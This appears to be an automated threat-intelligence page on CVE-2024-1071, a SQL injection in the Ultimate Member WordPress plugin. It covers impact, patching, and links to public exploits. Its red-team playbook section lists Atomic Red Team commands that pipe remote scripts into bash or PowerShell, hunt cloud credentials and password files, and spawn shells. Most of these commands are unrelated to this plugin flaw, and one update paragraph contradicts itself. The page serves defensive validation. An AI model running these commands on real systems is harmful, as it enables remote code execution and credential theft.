CVE-2024-1071
Overview
This vulnerability is a SQL Injection affecting the Ultimate Member WordPress plugin's member directory functionality. The root cause lies in improper sanitization and escaping of the 'sorting' parameter within SQL queries, allowing user input to be directly concatenated into database commands. The affected component is the member directory meta class handling user-supplied sorting options in versions 2.1.3 through 2.8.2.
Vulnerability Description
The Ultimate Member – User Profile, Registration, Login, Member Directory, Content Restriction & Membership Plugin plugin for WordPress is vulnerable to SQL Injection via the 'sorting' parameter in versions 2.1.3 to 2.8.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
Impact
An unauthenticated remote attacker can exploit this vulnerability to execute arbitrary SQL queries on the plugin's database, potentially extracting sensitive user data or modifying database contents. No authentication or user interaction is required, and the attack can be performed remotely over the network. This can lead to full confidentiality, integrity, and availability compromise of the underlying database, as reflected by the CVSS vector indicating high impact on confidentiality, integrity, and availability (C:H/I:H/A:H) with no privileges or user interaction needed.
Solution
Upgrade the Ultimate Member plugin to a version later than 2.8.2 where this issue is addressed. Refer to the Wordfence advisory (https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055) for detailed patch information. The fix involves proper sanitization and parameterization of the 'sorting' parameter within the member directory meta class. No official workaround is documented; immediate update to the patched version is recommended.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability within the Ultimate Member plugin for WordPress arises from a critical SQL Injection flaw that exploits the 'sorting' parameter. This issue stems from inadequate escaping of user-supplied input and a lack of proper preparation in the SQL query construction. When an application fails to sanitize inputs, it allows attackers to manipulate the SQL queries executed by the database. In this case, an unauthenticated user can inject arbitrary SQL commands, potentially leading to unauthorized access to sensitive data stored in the database, such as user credentials, personal information, and other confidential records.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. Since the flaw allows unauthenticated users to interact with the affected plugin, the barrier to entry for potential attackers is significantly lowered. An attacker could craft a malicious request that includes specially formatted input in the 'sorting' parameter, which would then be processed by the vulnerable SQL query. This could lead to various exploitation scenarios, including data exfiltration, where sensitive information is retrieved from the database, or even data manipulation, where the attacker could alter existing records. The potential for such exploitation underscores the need for robust security measures in web applications, particularly those that handle user data.
The real-world impact of this vulnerability can be severe, especially for businesses that rely on the Ultimate Member plugin for user management and membership functionalities. An attacker successfully exploiting this vulnerability could gain access to sensitive user data, leading to data breaches that could have legal repercussions, damage to reputation, and loss of customer trust. The financial implications of such breaches can be substantial, including costs associated with incident response, regulatory fines, and potential lawsuits from affected users. Furthermore, the presence of this vulnerability could expose organizations to further attacks, as compromised data may be used for phishing or social engineering attacks against users.
To detect and mitigate this vulnerability, organizations should implement several strategies. First and foremost, regular security audits and code reviews of the plugin and its dependencies can help identify and remediate vulnerabilities before they are exploited. Additionally, employing web application firewalls (WAFs) can provide an additional layer of protection by filtering out malicious requests that attempt to exploit SQL Injection flaws. It is also crucial to keep the Ultimate Member plugin and all other components of the WordPress installation updated to the latest versions, as updates often include security patches that address known vulnerabilities. Lastly, organizations should consider employing input validation and parameterized queries in their database interactions to prevent SQL Injection vulnerabilities from being introduced in the first place.
In conclusion, the SQL Injection vulnerability present in the Ultimate Member plugin poses a significant risk to WordPress sites utilizing this tool for user management. The ease of exploitation, coupled with the potential for severe real-world consequences, necessitates immediate attention from developers and organizations alike. By implementing proactive detection and mitigation strategies, businesses can safeguard their data and maintain the trust of their users in an increasingly hostile cyber landscape.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-1071, evidenced by a recent emergence of multiple new proof-of-concept exploit scripts circulating publicly. Our telemetry indicates that these developments have not driven a rapid increase in exploitation volume but have solidified the vulnerability’s accessibility to a broader attacker base, including less technically sophisticated threat actors. The availability of containerized exploit variants further lowers the barrier to entry for adversaries, potentially accelerating opportunistic attacks against unpatched WordPress installations using the Ultimate Member plugin. While the overall exploit trend remains stable, this expanded toolkit diversity and ease of deployment elevate the threat landscape, underscoring the criticality of timely patching and vigilant monitoring. Consequently, the risk level associated with CVE-2024-1071 should be considered heightened due to increased exploit maturity and wider dissemination within attacker communities.
Update 2 — July 20, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2024-1071, reflected by a doubling in detection activity across our sensors. This surge coincides with the emergence of additional proof-of-concept exploit scripts, including containerized variants that simplify deployment for less skilled adversaries. While the EPSS score remains high and stable, the expanded availability and diversity of exploit tools significantly lower the barrier to entry for attackers, increasing the likelihood of opportunistic and automated attacks against vulnerable WordPress environments. This development amplifies the threat landscape by accelerating potential compromise timelines and broadening the pool of threat actors capable of leveraging this critical SQL injection vulnerability. Consequently, the risk level associated with CVE-2024-1071 should be considered elevated, warranting heightened vigilance in detection and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Ultimatemember | Ultimate Member | All |
cpe:2.3:a:ultimatemember:ultimate_member:*:*:*:*:*:wordpress:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
Metasploit (1)
| Module | Authors | Rank | Platform | Link |
|---|---|---|---|---|
|
WordPress Ultimate Member SQL Injection (CVE-2024-1071)
auxiliary/scanner/http/wp_ultimate_member_sorting_sqli
|
Christiaan Swiers, Valentin Lobstein | Unknown | - | View |
GitHub PoCs (7)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
gh-ost00/CVE-2024-1071-SQL-Injection
Proof of concept : CVE-2024-1071: WordPress Vulnerability Exploited
|
gh-ost00 | 24 | 7 | 2024-08-30 | View |
|
gbrsh/CVE-2024-1071
Ultimate Member Unauthorized Database Access / SQLi
|
gbrsh | 8 | 1 | 2024-02-27 | View |
|
Trackflaw/CVE-2024-1071-Docker
CVE-2024-1071 with Docker
|
Trackflaw | 3 | 2 | 2024-03-04 | View |
|
Spid3heX/CVE-2024-1071-PoC-Script
wp/ultimate-member - SQL Injection Vulnerability Exploit Script.
|
Spid3heX | 2 | 1 | 2024-11-01 | View |
|
dogucyber/WordPress-Exploit-CVE-2024-1071
|
dogucyber | 2 | 1 | 2024-09-15 | View |
|
Matrexdz/CVE-2024-1071
CVE-2024-1071
|
Matrexdz | 1 | 0 | 2024-03-18 | View |
|
Matrexdz/CVE-2024-1071-Docker
|
Matrexdz | 1 | 0 | 2024-03-18 | View |
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (7)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-1071 |
| wordfence.com |
GitHub CVE
|
https://www.wordfence.com/threat-intel/vulnerabilities/id/005fa621-3c49-4c23-add5-d6b7a9110055?source=cve |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L666 |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/browser/ultimate-member/tags/2.8.2/includes/core/class-member-directory-meta.php?rev=3022076#L858 |
| wordpress.org |
GitHub CVE
|
https://wordpress.org/plugins/ultimate-member/ |
| plugins.trac.wordpress.org |
GitHub CVE
|
https://plugins.trac.wordpress.org/changeset/3038036/ultimate-member/trunk/includes/core/class-member-directory-meta.php |